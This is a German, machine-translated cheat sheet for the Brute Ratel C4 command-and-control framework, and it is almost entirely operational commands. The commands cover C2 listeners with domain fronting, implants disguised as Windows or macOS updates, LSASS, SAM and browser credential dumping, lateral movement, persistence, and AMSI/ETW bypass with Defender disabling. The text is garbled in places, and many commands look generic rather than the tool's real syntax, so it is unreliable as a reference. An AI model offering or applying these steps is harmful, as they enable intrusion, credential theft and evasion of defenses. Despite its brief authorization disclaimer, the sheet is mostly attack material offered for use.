Brute Ratel C4 Framework Cheat Sheet
Überblick
Brute Ratel C4 (BRc4) ist ein kommerzielles kundenspezifisches Kommando und Control (C2)-Framework, das für rote Teamoperationen und adversäre Simulationen konzipiert ist. Es bietet erweiterte Evasions-Funktionen, ausgeklügelte Funktionen der Nachbenutzung und professionelle Betriebssicherheit.
ZEIT Warning: Dies ist ein kommerzielles Tool, das eine gültige Lizenz benötigt. Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.
Installation
Lizenzaktivierung
```bash
Activate license (requires valid license key)
./brc4 --activate
Verify license status
./brc4 --license-info
Update license
./brc4 --update-license ```_
Server Setup
```bash
Start BRc4 server
./brc4 --server
Start with custom configuration
./brc4 --server --config /path/to/config.json
Start with specific interface
./brc4 --server --interface 0.0.0.0 --port 443 ```_
Client-Verbindung
```bash
Connect to server
./brc4 --client --server 192.168.1.100:443
Connect with authentication
./brc4 --client --server 192.168.1.100:443 --auth-token
Befehlsnummer
Serververwaltung
| | Command | Description | |
| --- | --- |
| | help | Display help menu | |
| | version | Show version information | |
| | listeners | List active listeners | |
| | badgers | List connected badgers (agents) | |
| | operators | List connected operators | |
| | exit | Exit BRc4 server | |
Hörer Management
| | Command | Description | |
| --- | --- |
| | listener http | Create HTTP listener | |
| | listener https | Create HTTPS listener | |
| | listener dns | Create DNS listener | |
| | listener tcp | Create TCP listener | |
| | listener smb | Create SMB listener | |
| | listener stop <id> | Stop listener | |
Badger (Agent) Management
| | Command | Description | |
| --- | --- |
| | badger <id> | Interact with badger | |
| | badger kill <id> | Kill badger | |
| | badger sleep <time> | Set sleep interval | |
| | badger jitter <percentage> | Set jitter percentage | |
| | badger proxy <proxy> | Set proxy for badger | |
Hörer Konfiguration
HTTP/HTTPS Hörer
```bash
Create HTTPS listener
listener https set host 0.0.0.0 set port 443 set cert /path/to/cert.pem set key /path/to/key.pem set malleable /path/to/profile.profile start
Create HTTP listener with domain fronting
listener http set host 0.0.0.0 set port 80 set front-domain cdn.example.com set host-header legitimate-site.com start ```_
DNS Listener
```bash
Create DNS listener
listener dns set domain example.com set nameserver ns1.example.com set port 53 start ```_
BMB Hörer
```bash
Create SMB listener
listener smb set pipename msagent_pipe set host 0.0.0.0 set port 445 start ```_
TCP Hörer
```bash
Create TCP listener
listener tcp set host 0.0.0.0 set port 4444 set bind true start ```_
Die erste Generation
Windows Badgers
```bash
Generate Windows executable
generate windows exe set listener https-443 set arch x64 set format exe set output windows_badger.exe generate
Generate Windows DLL
generate windows dll set listener https-443 set arch x64 set format dll set output windows_badger.dll generate
Generate Windows service
generate windows service set listener https-443 set arch x64 set service-name "WindowsUpdate" set output windows_service.exe generate ```_
Linux Badgers
```bash
Generate Linux ELF
generate linux elf set listener https-443 set arch x64 set format elf set output linux_badger generate
Generate Linux shared library
generate linux so set listener https-443 set arch x64 set format so set output linux_badger.so generate ```_
macOS Badgers
```bash
Generate macOS binary
generate macos macho set listener https-443 set arch x64 set format macho set output macos_badger generate
Generate macOS application
generate macos app set listener https-443 set arch x64 set app-name "Updater" set output macos_app.app generate ```_
Post-Exploitationsbefehle
Systeminformationen
```bash
Get system information
sysinfo
Get current user
whoami
Get privileges
getprivs
Get environment variables
env
Get network interfaces
ifconfig ```_
Dateioperationen
```bash
List directory
ls /path/to/directory
Change directory
cd /path/to/directory
Download file
download /remote/path/file.txt
Upload file
upload /local/path/file.txt /remote/path/
Execute file
execute /path/to/executable
Delete file
rm /path/to/file ```_
Prozessmanagement
```bash
List processes
ps
Kill process
kill
Migrate to process
migrate
Inject into process
inject
Create process
spawn
Netzwerkaktivitäten
```bash
Network connections
netstat
ARP table
arp
Routing table
route
Port scan
portscan 192.168.1.0/24 80,443,3389
Ping sweep
ping 192.168.1.0/24 ```_
Erweiterte Funktionen
Malleable C2 Profile
```bash
Load malleable profile
set malleable /path/to/profile.profile
Custom HTTP profile
http-get \\{ set uri "/api/v1/status"; client \\{ header "User-Agent" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"; header "Accept" "application/json"; \\} server \\{ header "Content-Type" "application/json"; output \\{ print; \\} \\} \\} ```_
Verfahrensinjektionstechniken
```bash
Classic DLL injection
inject-dll
Process hollowing
hollow
Reflective DLL loading
reflective-dll /path/to/dll.dll
Manual DLL mapping
map-dll
Thread hijacking
hijack-thread
Credential Harvesting
```bash
Dump LSASS
lsass-dump
Mimikatz integration
mimikatz sekurlsa::logonpasswords
SAM dump
sam-dump
LSA secrets
lsa-secrets
Cached credentials
cache-dump
Browser credentials
browser-creds ```_
Spätere Bewegung
```bash
WMI execution
wmi-exec 192.168.1.10 "whoami"
PSExec
psexec 192.168.1.10 "whoami"
SMB execution
smb-exec 192.168.1.10 "whoami"
DCOM execution
dcom-exec 192.168.1.10 "whoami"
WinRM execution
winrm-exec 192.168.1.10 "whoami" ```_
Persistenzmechanismen
```bash
Registry persistence
persist-registry HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "Update" "C:\temp\badger.exe"
Scheduled task
persist-task "WindowsUpdate" "C:\temp\badger.exe" daily
Service persistence
persist-service "UpdateService" "C:\temp\badger.exe"
WMI persistence
persist-wmi "ProcessStart" "C:\temp\badger.exe"
Startup folder
persist-startup "C:\temp\badger.exe" ```_
Evasion Techniken
Antianalyse
```bash
VM detection
vm-detect
Sandbox evasion
sandbox-evasion
Debugger detection
debugger-detect
Sleep evasion
sleep-evasion 300
User interaction check
user-interaction ```_
AMSI/ETW Bypass
```bash
AMSI bypass
amsi-bypass
ETW bypass
etw-bypass
Disable Windows Defender
disable-defender
Unhook DLLs
unhook-dlls
Patch AMSI
patch-amsi ```_
Verkehrsobfukation
```bash
Domain fronting
set front-domain cdn.cloudflare.com set host-header legitimate-site.com
Custom User-Agent
set user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
Custom headers
set headers "X-Forwarded-For: 192.168.1.100"
Proxy chains
set proxy-chain "http://proxy1:8080,socks5://proxy2:1080" ```_
Belastbarkeit
```bash
Encrypt payload
encrypt-payload aes256
Obfuscate strings
obfuscate-strings
Pack executable
pack-exe upx
Sign executable
sign-exe /path/to/cert.pfx
Polymorphic generation
polymorphic-gen ```_
Operationelle Sicherheit
Kommunikationssicherheit
```bash
Use encrypted channels
set encryption aes256
Certificate pinning
set cert-pinning true
Custom TLS configuration
set tls-version 1.3 set cipher-suite ECDHE-RSA-AES256-GCM-SHA384
Jitter configuration
set jitter 20 set jitter-type random ```_
Infrastrukturmanagement
```bash
Redirector setup
set redirector nginx set upstream-server 192.168.1.100:443
Load balancing
set load-balancer round-robin set backend-servers "192.168.1.100,192.168.1.101"
Failover configuration
set failover-servers "backup1.com,backup2.com" ```_
Protokollierung und Überwachung
```bash
Enable detailed logging
set log-level debug set log-file /var/log/brc4.log
Operator tracking
set operator-logging true
Command auditing
set command-audit true
Session recording
set session-recording true ```_
Team Operations
Multi-Operator Unterstützung
```bash
Add operator
operator add username password
Set operator permissions
operator permissions username read,write,execute
Operator sessions
operator sessions
Kick operator
operator kick username ```_
Funktionen der Zusammenarbeit
```bash
Share badger session
share-session
Session notes
note-add "Important finding"
note-list
note-delete
Team chat
chat "Message to team" chat-history ```_
Fehlerbehebung
Verbindungsprobleme
```bash
Test listener
test-listener
Check connectivity
test-connectivity
Verify certificates
verify-cert /path/to/cert.pem
Debug mode
set debug true ```_
Schlechtere Probleme
```bash
Badger health check
health-check
Reset badger
reset-badger
Badger diagnostics
diagnostics
Force reconnect
reconnect
Leistungsoptimierung
```bash
Optimize sleep intervals
set sleep-optimization true
Bandwidth throttling
set bandwidth-limit 1024
Connection pooling
set connection-pooling true
Compression
set compression gzip ```_
Konfiguration
Serverkonfiguration
json
\\\\{
"server": \\\\{
"host": "0.0.0.0",
"port": 443,
"ssl": true,
"cert": "/path/to/cert.pem",
"key": "/path/to/key.pem"
\\\\},
"database": \\\\{
"type": "sqlite",
"path": "/opt/brc4/database.db"
\\\\},
"logging": \\\\{
"level": "info",
"file": "/var/log/brc4.log"
\\\\}
\\\\}_
Profil anzeigen
```c
Custom malleable profile
set sample_name "Custom Profile"; set sleeptime "30000"; set jitter "20"; set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";
http-get \\{ set uri "/api/status"; client \\{ header "Accept" "application/json"; header "Accept-Language" "en-US,en;q=0.9"; \\} server \\{ header "Content-Type" "application/json"; output \\{ print; \\} \\} \\} ```_
Ressourcen
- [Brute Ratel C4 Offizielle Website](_LINK_4___ -%20BRc4%20Dokumentation
- [Red Team Operations Guide](__LINK_4___ -%20Malleable%20C2%20Profiles
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Brute Ratel C4. Dies ist ein kommerzielles Werkzeug, das eine ordnungsgemäße Lizenzierung erfordert. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie dieses Tool in jeder Umgebung verwenden. *